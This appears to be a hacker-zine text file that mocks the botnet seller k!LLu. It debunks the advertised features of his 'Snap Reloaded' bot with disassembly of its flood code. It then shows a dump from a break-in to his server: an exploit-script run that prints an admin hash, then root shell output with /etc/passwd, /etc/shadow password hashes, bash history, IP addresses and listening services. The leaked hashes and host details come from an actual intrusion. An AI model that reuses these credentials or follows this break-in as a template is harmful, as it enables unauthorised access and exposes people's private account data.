| | ; : | | ------ k!LLu, thou shall + | | (.-.) | | officially be owned + | | ,' ___ `. | | to fuck. + ; |)/ ,'---'. \(| : + _,-/ |/\( )/\| \-._ + _..--'.-( | `-'''-' | )-.`--.._ + `. ;`._________,': ,' + ,' `/ \'`. + `------.------' + +One thing that has always been connected to k!LLu was the botnet he +kept bragging about. It probably all started back at crimenetwork when +he ddosed competitors to at least get some visitors. Knowing k!LLu, +one would think his botnet was just imaginary like most of the other +things he rambles about. But no, k!LLu actually had a botnet for which +he used his own botsoftware "Snap Reloaded". 
Unsurprisingly, this +piece of malware is just as bad as most of the other things he has +been working on. If you don't find at least two pre-auth +vulnerabilities within a minute of looking at the panel's source you +must be seriously retarded and it was accordingly easy to break into +his boxes. k!LLu hosts more than one panel most of which are run from +separate VMs and probably belong to some of his customers. In fact +everyone who's hosting their net on k!llu's server is actually +donating bots to k!LLu. He is a master of advertising but +unfortunately, he doesn't take telling the truth too seriously. That's +why we'll take a look into the "Snap Reloaded" bot he is selling. + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] User-Mode (ring3) r00tkit | +| -> [+] run's as a service and hide himself | +| -> [+] hides&protect root process | +| -> [+] hides&protect files | +| -> [+] hides root processes | +| -> [+] hides used local&remote TCP Port(s) <- thx to jeffosz | +| -> [+] hides used local&remote UDP Port(s) <- thx to jeffosz | +| -> [+] hides used regkey''s | +|____________________________________________________________________| + +You don't think k!LLu'd be shameless enough to _invent_ a feature? He +did. Well, at least not a single binary we could get our hands on +showed any signs of a rootkit. A 3-year-old would be able to kill the +process and kick that piece of shit into the trashcan. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. 
| +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] METAMORPHIC architecture | +| -> [+] use random legit process,file & service names | +| -> [+] generate a unique stub every run | +| -> [+] whole software gets metamorph virtualized byte per byte | +|____________________________________________________________________| + +Again, a hardcoded list of processnames, that aren't at all "legit" is +not that cool. And, unsurprisingly, the bot isn't virtualized. But +hey, he used UPX, we give him that. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] webpanel developped with dreamweaver cs5 and own ajax | +| framework using mysql and php | +| -- no ressource wasting jquery/extJS shit like kerber0s, | +| EliteLoader | +| [+] multi theme support | +| [+] multi command support => every victim can do as many threads | +| as you want | +| [+] reliable protocoll which creates the lowest possible server | +| load | +| [+] modularized structure | +| [+] Blocks common Trackers | +| [+] dynamic ConnectionDelay => if server load raises, delay | +| raises and you are able to host over 25000Victims on a little | +| VPS | +|____________________________________________________________________| + +The next thing on the list is the webpanel. It's partially ioncube +encoded but still runs perfectly without even changing anything. As +said above, it's also pretty straight forward to find several vulns in +it. But wait: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. 
| +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| [+] XSS/SQLi Prevention Firewall | +|____________________________________________________________________| + +And we really gotta say: this thing is the shit. Well, of course it +doesn't exist but who'd bother and check anyways? + +$ ./killu_u_r_lame.pl bgate.secure-host.in + bl1ng bl1ng! + admin:76a2173be6393254e72ffa4d6df1030a +$ + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| Another interessting thing is, thats is the WORLDS FIRST BOT | +| which patches tcpip.sys/tcpstack on ALL WIN-OS(including Win8) | +| via DCI and Windows-own Testsigning Mode | +| This allows us again to use half-open connections and rawSockets! | +| and grant us to use things like IP Spoofing or REAL SYNFLOOD ! | +| | +| This is the really awesome part, of this state-of-the-Art Botnet | +| software! DDoS Class is written in pure (m)ASM to get the maximum | +| possible stability and maximum possible Attack-strength/Power. | +| Everyone who says his Bot is stronger, LIES | +| There's NO WAY to get DDoS stronger! | +|____________________________________________________________________| + +Wow, k!LLu talking about people lying, somewhat ironic. Let's have a +look at this badass functions of his. + +[...] 
+movzx eax, byte ptr [ebp+14] ; | +mov dword ptr [ebp-C], ebx ; | +mov dword ptr [ebp-8], esi ; | +mov esi, dword ptr [ebp+8] ; | +mov byte ptr [ebp-11], al ; | +xor eax, eax ; | +mov dword ptr [ebp-4], edi ; | +mov edi, dword ptr [ebp+C] ; | +movsx ebx, word ptr [ebp+10] ; | +mov dword ptr [esp+8], eax ; | +mov eax, 1 ; | +mov dword ptr [esp+4], eax ; | +mov dword ptr [esp], 2 ; | +call near dword ptr [41E0E8] ; \socket +mov dword ptr [esi+190], eax +sub esp, 0C +inc eax ; | +je 004029E6 ; | +movzx eax, bx ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E0] ; \ntohs +mov ecx, 2 +mov word ptr [esi+194], cx +sub esp, 4 +mov word ptr [esi+196], ax ; | +mov eax, dword ptr [edi] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E4] ; \inet_addr +sub esp, 4 +inc eax ; | +je 00402A10 ; | +mov eax, dword ptr [edi] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0E4] ; \inet_addr +sub esp, 4 +mov dword ptr [esi+198], eax +cmp byte ptr [ebp-11], 0 +jnz 00402A02 +mov dword ptr [ebp-10], 1 +lea eax, dword ptr [ebp-10] ; | +mov dword ptr [esp+8], eax ; | +mov eax, 8004667E ; | +mov dword ptr [esp+4], eax ; | +mov eax, dword ptr [esi+190] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0A8] ; \ioctlsocket +mov eax, 10 +sub esp, 0C +mov dword ptr [esp+8], eax ; | +lea eax, dword ptr [esi+194] ; | +mov dword ptr [esp+4], eax ; | +mov eax, dword ptr [esi+190] ; | +mov dword ptr [esp], eax ; | +call near dword ptr [41E0D8] ; \connect +[...] + +This is an excerpt from his "synflood" function. It's obvious that +creating a new sockaddr structure for every time you call connect is +not efficient at all. He also seems to think setting a socket to +non-blocking mode via ioctlsocket would make his simple tcp flood look +like a synflood. But let's look at the code that calls this from +within the ddos thread and quickly reveals that this is compiler +generated rather than "plain assembly". + +push ebp +mov ebp, esp +[...] 
+mov eax, dword ptr [41E06C] ; ||| +mov eax, dword ptr [eax+14] ; ||| +mov dword ptr [esp], eax ; ||| +call ; ||\atoi +mov dword ptr [ebp-70], eax ; || +mov eax, dword ptr [41E06C] ; || +mov eax, dword ptr [eax+C] ; || +mov dword ptr [esp], eax ; || +call ; |\atoi +mov dword ptr [ebp-74], eax ; | +mov eax, dword ptr [41E06C] ; | +mov eax, dword ptr [eax+8] ; | +mov dword ptr [esp], eax ; | +call ; \atoi +[...] +mov esi, esi ; plain asm in the hewd +[...] +mov dword ptr [esp], 0 ; | +call ; \ExitThread +[...] + +But don't be too sad, k!LLu. We got some exciting news for you: +userspace ddos code is not the bottleneck. You're probably trying to +get your bots back after we rmd your box but we're afraid we were able +to clean a majority of them up. + +# uname -a +Linux link.cyberhost.kz 2.6.18-238.9.1.el5.028stab089.1PAE #1 SMP Thu Apr 14 14:38:02 MSD 2011 i686 athlon i386 GNU/Linux + +# id +uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) + +# cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/etc/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +nscd:x:28:28:NSCD Daemon:/:/sbin/nologin +vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin +rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin +mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin +smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin +pcap:x:77:77::/var/arpwatch:/sbin/nologin +dbus:x:81:81:System message 
bus:/:/sbin/nologin +haldaemon:x:68:68:HAL daemon:/:/sbin/nologin +avahi:x:70:70:Avahi daemon:/:/sbin/nologin +sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin +rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin +nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin +apache:x:48:48:Apache:/var/www:/sbin/nologin +lxlabs:x:500:500::/home/lxlabs:/sbin/nologin +mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash +truevm:x:503:503:System User for 130:/home/truevm:/usr/bin/lxopenvz +stansecuvm:x:504:504:System User for 140:/home/stansecuvm:/usr/bin/lxopenvz +bnetvm:x:506:506:System User for 160:/home/bnetvm:/usr/bin/lxopenvz +scriptstvm:x:508:508:System User for 180:/home/scriptstvm:/usr/bin/lxopenvz +spikevm:x:514:514:System User for 240:/home/spikevm:/usr/bin/lxopenvz +xtothecvm:x:515:515:System User for 250:/home/xtothecvm:/usr/bin/lxopenvz +y00vm:x:516:516:System User for 260:/home/y00vm:/usr/bin/lxopenvz +iodasvm:x:517:517:System User for 270:/home/iodasvm:/usr/bin/lxopenvz +rootvm:x:520:520:System User for 300:/home/rootvm:/usr/bin/lxopenvz +stansocksvm:x:521:521:System User for 310:/home/stansocksvm:/usr/bin/lxopenvz +bdgatevm:x:524:524:System User for 340:/home/bdgatevm:/usr/bin/lxopenvz +fredvm:x:525:525:System User for 350:/home/fredvm:/usr/bin/lxopenvz +spike80vm:x:526:526:System User for 360:/home/spike80vm:/usr/bin/lxopenvz +ixdevm:x:527:527:System User for 370:/home/ixdevm:/usr/bin/lxopenvz +wohovm:x:528:528:System User for 380:/home/wohovm:/usr/bin/lxopenvz +sethvm:x:529:529:System User for 390:/home/sethvm:/usr/bin/lxopenvz + +# cat /etc/shadow +root:$1$v.vPGI.9$s9ss0TBUPqOe9X3ufPT4W1:15105:0:99999:7::: +bin:*:15105:0:99999:7::: +daemon:*:15105:0:99999:7::: +adm:*:15105:0:99999:7::: +lp:*:15105:0:99999:7::: +sync:*:15105:0:99999:7::: +shutdown:*:15105:0:99999:7::: +halt:*:15105:0:99999:7::: +mail:*:15105:0:99999:7::: 
+news:*:15105:0:99999:7::: +uucp:*:15105:0:99999:7::: +operator:*:15105:0:99999:7::: +games:*:15105:0:99999:7::: +gopher:*:15105:0:99999:7::: +ftp:*:15105:0:99999:7::: +nobody:*:15105:0:99999:7::: +nscd:!!:15105:0:99999:7::: +vcsa:!!:15105:0:99999:7::: +rpc:!!:15105:0:99999:7::: +mailnull:!!:15105:0:99999:7::: +smmsp:!!:15105:0:99999:7::: +pcap:!!:15105:0:99999:7::: +dbus:!!:15105:0:99999:7::: +haldaemon:!!:15105:0:99999:7::: +avahi:!!:15105:0:99999:7::: +sshd:!!:15105:0:99999:7::: +avahi-autoipd:!!:15105:0:99999:7::: +rpcuser:!!:15105:0:99999:7::: +nfsnobody:!!:15105:0:99999:7::: +apache:!!:15106:::::: +lxlabs:!!:15106:0:99999:7::: +mysql:!!:15106:::::: +truevm:$1$Cp/eTTFF$nqVR5/rgSvqs51UIuz6Et.:15251:0:99999:7::: +stansecuvm:$1$o3WpZh6S$mPXWzQjMEL5zIkwBFhGGD1:15112:0:99999:7::: +bnetvm:$1$V.AhGgm3$o4ZdgfznQ3sE2.1KJa0qx/:15115:0:99999:7::: +scriptstvm:$1$W5AWFCAH$dbJijEizlB92aFTY7HCDX.:15116:0:99999:7::: +spikevm:$1$m1v5zxhw$xs3WszkyroI/FWi8djdo4.:15132:0:99999:7::: +xtothecvm:$1$D9ZLxI1c$Sopa3HPCOBTRC4c6KBtCD/:15134:0:99999:7::: +y00vm:$1$k1GqAtHB$mdsd292s..nL/v6YG5Tfz0:15138:0:99999:7::: +iodasvm:$1$6laui1W/$L/evF8MACUrrJ.AUbBC2E.:15138:0:99999:7::: +rootvm:$1$0rDTGCQP$1OK0z1ldsptZuWD9YJmfM.:15201:0:99999:7::: +stansocksvm:$1$KbcEDmUM$Idr7lpMI/JOYU0pY3uafF/:15201:0:99999:7::: +bdgatevm:$1$0TIPnn9P$.IoVhoG0DYMW0gUfzUqnH/:15208:0:99999:7::: +fredvm:$1$QKXpFmyk$tNA8I7G6ZCc5eKbuHyHTr/:15222:0:99999:7::: +spike80vm:$1$Ir2OIga1$Xfp.9xdaXFWaaxc18Q/hR/:15224:0:99999:7::: +ixdevm:$1$xK6jSstU$cOuss77pdmE6YfUmBL2pa1:15226:0:99999:7::: +wohovm:$1$SRfLhbuK$gz/o3IYB/WJdHKGPhll6z0:15233:0:99999:7::: +sethvm:$1$aal3q4fB$bf2DeWIqbsZ/IVjBGhepv0:15250:0:99999:7::: + +# pwd +/root + +# alias ls="ls -la" + +# ls +total 341288 +drwxr-x--- 4 root root 4096 Oct 9 08:20 . +drwxr-xr-x 25 root root 4096 Oct 10 05:48 .. 
+-rw------- 1 root root 6069 Oct 9 08:37 .bash_history +-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout +-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile +-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc +-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc +drwxr-xr-x 16 root root 4096 May 10 2009 .etc +-rw------- 1 root root 41 Oct 9 07:59 .lesshst +-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc +-rw-r--r-- 1 root root 134392688 May 12 02:28 1000mb.bin +-rw-r--r-- 1 root root 135565568 May 12 05:16 1000mb.bin.1 +-rw-r--r-- 1 root root 30797000 May 12 02:23 100mb.test +-rw-r--r-- 1 root root 48135408 May 12 02:55 100mb.test.1 +-rw------- 1 root root 1171 May 11 09:46 anaconda-ks.cfg +-rw-r--r-- 1 root root 719 May 12 01:03 hypervm-install-master.sh +-rw-r--r-- 1 root root 14502 May 11 09:46 install.log +-rw-r--r-- 1 root root 2886 May 11 09:46 install.log.syslog +drwxr-xr-x 7 root root 4096 May 12 01:04 program-install +-rw-r--r-- 1 root root 68091 Jun 4 2009 program-install.zip + +# cat .bash_history +yum install openssh-server net-snmp +nano /etc/snmp/snmpd.conf +/etc/init.d/snmpd restart +exit +top +setenforce 0 +wget http://download.lxcenter.org/download/hypervm/production/hypervm-install-master.sh +sh ./hypervm-install-master.sh --virtualization-type=xen/openvz/NON +sh ./hypervm-install-master.sh --virtualization-type=openvz +nano /etc/grub.conf +shutdown -r now +wget http://mirror.leaseweb.com/speedtest/1000mb.bin +top +service hypervm +service hypervm start +yum install iptraf +iptraf +nano /etc/resolv.conf +nano /etc/resolv.conf +ifconfig +tracert +tracert 193.107.16.183 +193.107.16.82 +tracert 193.107.16.183 +wget http://cachefly.cachefly.net/100mb.test +wget http://cachefly.cacwget http://cachefly.cachefly.net/100mb.testhefly.net/100mb.test +get http://cachefly.cachefly.net/1000mb.test +wget http://cachefly.cachefly.net/1000mb.test +wget http://cachefly.cachefly.net/100mb.test +wget http://mirror.leaseweb.com/speedtest/1000mb.bin +lsmod |grep -i ipt_conntrack 
+/sbin/modprobe ipt_owner +/sbin/modprobe ipt_recent +/sbin/modprobe ipt_tos +/sbin/modprobe ipt_TOS +/sbin/modprobe ipt_LOG +/sbin/modprobe ip_conntrack +/sbin/modprobe ipt_limit +/sbin/modprobe ipt_multiport +/sbin/modprobe iptable_filter +/sbin/modprobe iptable_mangle +/sbin/modprobe iptable_TCPMSS +/sbin/modprobe iptable_tcpmss +/sbin/modprobe ipt_tcpmss +/sbin/modprobe ipt_ttl +/sbin/modprobe ipt_length +/sbin/modprobe ipt_state +/sbin/modprobe ipt_nat +/sbin/modprobe ip_nat_ftp +nano /etc/sysconfig/iptables-config +nano /etc/sysconfig/vz +service iptables restart +service vz start +service vz stop +service iptables restart +service vz start +iptables -A INPUT -p tcp --dport 80 -j DROP +iptables -A INPUT -p tcp --dport 3306 -j DROP +ping www.besthotshop.info +ping www.ddstores.com +modprobe ipt_limit +nano /etc/sysconfig/iptables-config +nano /etc/sysconfig/vz +iptables restart +/etc/init.d/iptables restart +vzctl set 110 --iptables "ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save + + + + +save +-- save +vzctl set 110 --iptables iptable_nat --save +vzctl stop 110 +vzctl set 110 --iptables iptable_nat --save +vzctl set 110 --iptables iptable_nat ipt_limit --save +vzctl set 110 --iptables ipt_limit --save +vzctl restart 110 +vzctl stop 110 +nano /etc/sysconfig/vz +service vz restart +vzctl set 110 --numiptent 2000 --save +vzctl stop 110 +vzctl set 110 --iptables +vzctl set 110 --iptables ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save +vzctl set 110 --iptables +vzctl set 110 --iptables -h +vzctl set 110 -h +vzctl set 110 --help +modprobe ipt_limit + +ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_l +iptables 
-A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j DROP +iptables --flush +service vz restart +iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 8 -j DROP +sdasdasdasd +modprobe ipt_connlimit +nano /etc/sysconfig/vz +nano /etc/sysconfig/iptables-config +/etc/init.d/iptables restart +service vz restart +shutdown -r now +service vz restart +lsmod | grep ipt +modprobe -v xt_connlimit +echo 2262144 > /proc/sys/net/ipv4/ip_conntrack_max +echo 22262144 > /proc/sys/net/ipv4/ip_conntrack_max +dmeg +dmesg +iptables --flush +service iptables restart +iptraf +modprobe xt_state +sysctl net.ipv4.netfilter.ip_conntrack_max +wc -l /proc/net/ip_conntrack +sysctl - +sysctl -po +sysctl -p +nano /etc/sysctl.conf +sysctl -p +nano /etc/sysctl.conf +sysctl -p +sysctl -p | grep mem +sysctl -p | grep mem +yum install htop +system-config-network +ifconfig +ping 193.107.17.66 +ping 193.107.17.67 +iptables --flush +ping 193.107.17.80 +sysctl -p | grep mem +ping 193.107.17.66 +ping 193.107.17.80 +nano /etc/sysctl.conf +service network restart +ip route +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +service network restart +service network restart +ip route +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +ip route +ip route add 193.107.17.80 dev venet0 scope link +ip route add 193.107.17.66 dev venet0 scope link +nano /etc/sysctl.conf +service sysctl restart +sysctl -p +sysctl -a +ip route +ip route add 193.107.17.66 dev eth0 scope link +ip route add 193.107.17.67 dev eth0 scope link +ip rute +ip route +service network restart +ifup-local +ip route +ip route add 193.107.17.0/24 dev eth0 +route add 193.107.17.0/24 netmask 255.255.255.0 dev eth1 + +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.1 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66 +ip route add 
193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 +route +redhat-config-network +network-admin +route add default2 gw 193.107.17.1 eth0 +route add default gw 193.107.17.1 eth0 +route +service httpd stop +route add default gw 193.107.17.1 eth0 +route add default2 gw 193.107.17.1 eth0 +ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68 +ip route add 193.107.17.0/24 dev eth0 +ifconfig +route add default gw 193.107.17.1 eth0 +ip route add 193.107.17.0/24 dev eth0 +service network restart +ip route add 193.107.17.0/24 dev eth0 +route add default gw 193.107.17.1 eth0 + +ip route add 193.107.17.0/24 dev venet0 +netstat +paswd +passwd +modprobe tun +vzctl set 310 --devices c:10:200:rw --save +vzctl set 310 --capability net_admin:on --save +modprobe ipt_mark +modprobe ipt_MARK +modprobe tun +vzctl stop 310 +vzctl set 310 --capability net_admin:on --save +vzctl set 310 --devices c:10:200:rw --save +vzctl start 310 +vzctl exec 310 mkdir -p /dev/net +vzctl exec 310 mknod /dev/net/tun c 10 200 +vzctl exec 310 chmod 600 /dev/net/tun +df +top +su bnetvm +iptables -A INPUT -p tcp --destination-port 80 -j DROP +top +hitop +htop +ftop +iftop +netstat + +# ifconfig +eth0 Link encap:Ethernet HWaddr E0:CB:4E:4F:A7:D8 + inet addr:193.107.16.82 Bcast:193.107.16.255 Mask:255.255.255.0 + inet6 addr: fe80::e2cb:4eff:fe4f:a7d8/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:3764684 errors:0 dropped:0 overruns:0 frame:0 + TX packets:2963185 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:517778892 (493.7 MiB) TX bytes:429952789 (410.0 MiB) + Interrupt:90 Base address:0x2000 + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + inet6 addr: ::1/128 Scope:Host + UP LOOPBACK RUNNING MTU:16436 Metric:1 + RX packets:3830 errors:0 dropped:0 overruns:0 frame:0 + TX packets:3830 errors:0 dropped:0 
overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:257453 (251.4 KiB) TX bytes:257453 (251.4 KiB) + +venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 + UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 + RX packets:2952095 errors:0 dropped:0 overruns:0 frame:0 + TX packets:3188473 errors:0 dropped:313 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:387733783 (369.7 MiB) TX bytes:408435813 (389.5 MiB) + + +# netstat -tulpn +Active Internet connections (only servers) +Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name +tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 9044/tcpserver +tcp 0 0 0.0.0.0:7778 0.0.0.0:* LISTEN 338/kloxo.httpd +tcp 0 0 127.0.0.1:7776 0.0.0.0:* LISTEN 22868/php +tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 9051/tcpserver +tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 8760/tcpserver +tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN 6813/tcpserver +tcp 0 0 0.0.0.0:7779 0.0.0.0:* LISTEN 744/php +tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN 31415/sendmail: MTA +tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 28959/xinetd +tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 27340/named +tcp 0 0 193.107.16.217:53 0.0.0.0:* LISTEN 21090/named +tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 21090/named +tcp 0 0 0.0.0.0:7777 0.0.0.0:* LISTEN 20789/kloxo.httpd +tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 12611/xinetd +tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 21054/sshd +tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 18864/mysqld +tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2855/apache2 +tcp 0 0 193.107.17.80:53 0.0.0.0:* LISTEN 14937/named +tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2255/mysqld +tcp 0 0 193.107.17.81:53 0.0.0.0:* LISTEN 29195/named +tcp 0 0 193.107.16.197:443 0.0.0.0:* LISTEN 19137/lighttpd +tcp 0 0 0.0.0.0:55986 0.0.0.0:* LISTEN 350/perl +tcp 0 0 0.0.0.0:65500 0.0.0.0:* LISTEN 22852/perl +tcp 0 0 0.0.0.0:5544 0.0.0.0:* LISTEN 6594/sshd +tcp 0 0 193.107.17.69:53 0.0.0.0:* LISTEN 24903/named +tcp 0 0 193.107.16.184:53 0.0.0.0:* LISTEN 16961/named +tcp 0 0 
193.107.16.183:53 0.0.0.0:* LISTEN 24588/named +tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 25293/sendmail: MTA +tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 6276/portmap +tcp 0 0 193.107.16.196:53 0.0.0.0:* LISTEN 30862/named +tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 15210/smbd +tcp 0 0 193.107.17.67:53 0.0.0.0:* LISTEN 25565/named +tcp 0 0 193.107.16.81:53 0.0.0.0:* LISTEN 12513/named +tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 21079/php-fpm.conf) +tcp 0 0 127.0.0.1:8886 0.0.0.0:* LISTEN 8978/php +tcp 0 0 193.107.16.55:53 0.0.0.0:* LISTEN 8944/named +tcp 0 0 0.0.0.0:8887 0.0.0.0:* LISTEN 7026/hypervm.httpd +tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 6608/cupsd +tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN 7026/hypervm.httpd +tcp 0 0 193.107.17.83:53 0.0.0.0:* LISTEN 18447/named +tcp 0 0 0.0.0.0:8889 0.0.0.0:* LISTEN 8978/php +tcp 0 0 0.0.0.0:985 0.0.0.0:* LISTEN 6315/rpc.statd +tcp 0 0 193.107.17.68:53 0.0.0.0:* LISTEN 27340/named +tcp 0 0 193.107.16.55:443 0.0.0.0:* LISTEN 16889/lighttpd +tcp 0 0 127.0.0.1:2000 0.0.0.0:* LISTEN 25205/varnishd +tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 20954/nginx +tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 15210/smbd +tcp 0 0 :::80 :::* LISTEN 28969/httpd +tcp 0 0 :::21 :::* LISTEN 31096/proftpd: (acc +tcp 0 0 ::1:953 :::* LISTEN 27340/named +tcp 0 0 :::22 :::* LISTEN 21198/sshd +tcp 0 0 :::443 :::* LISTEN 2460/httpd +tcp 0 0 :::5544 :::* LISTEN 6594/sshd +tcp 0 0 :::53 :::* LISTEN 16961/named +udp 0 0 0.0.0.0:111 0.0.0.0:* 6276/portmap +udp 0 0 193.107.16.55:53 0.0.0.0:* 8944/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 8944/named +udp 0 0 193.107.16.197:53 0.0.0.0:* 15203/tinydns +udp 0 0 193.107.16.81:53 0.0.0.0:* 12513/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 12513/named +udp 0 0 193.107.16.184:53 0.0.0.0:* 16961/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 16961/named +udp 0 0 193.107.17.80:53 0.0.0.0:* 14937/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 14937/named +udp 0 0 193.107.17.83:53 0.0.0.0:* 18447/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 18447/named +udp 0 0 193.107.16.184:137 
0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:137 0.0.0.0:* 14895/nmbd +udp 0 0 0.0.0.0:137 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.184:138 0.0.0.0:* 14895/nmbd +udp 0 0 0.0.0.0:138 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.217:53 0.0.0.0:* 21090/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 21090/named +udp 0 0 193.107.16.183:53 0.0.0.0:* 24588/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 24588/named +udp 0 0 193.107.17.69:53 0.0.0.0:* 24903/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 24903/named +udp 0 0 193.107.17.67:53 0.0.0.0:* 25565/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 25565/named +udp 0 0 193.107.17.68:53 0.0.0.0:* 27340/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 27340/named +udp 0 0 193.107.17.81:53 0.0.0.0:* 29195/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 29195/named +udp 0 0 193.107.16.196:53 0.0.0.0:* 30862/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 30862/named +udp 0 0 0.0.0.0:631 0.0.0.0:* 6608/cupsd +udp 0 0 0.0.0.0:979 0.0.0.0:* 6315/rpc.statd +udp 0 0 0.0.0.0:982 0.0.0.0:* 6315/rpc.statd 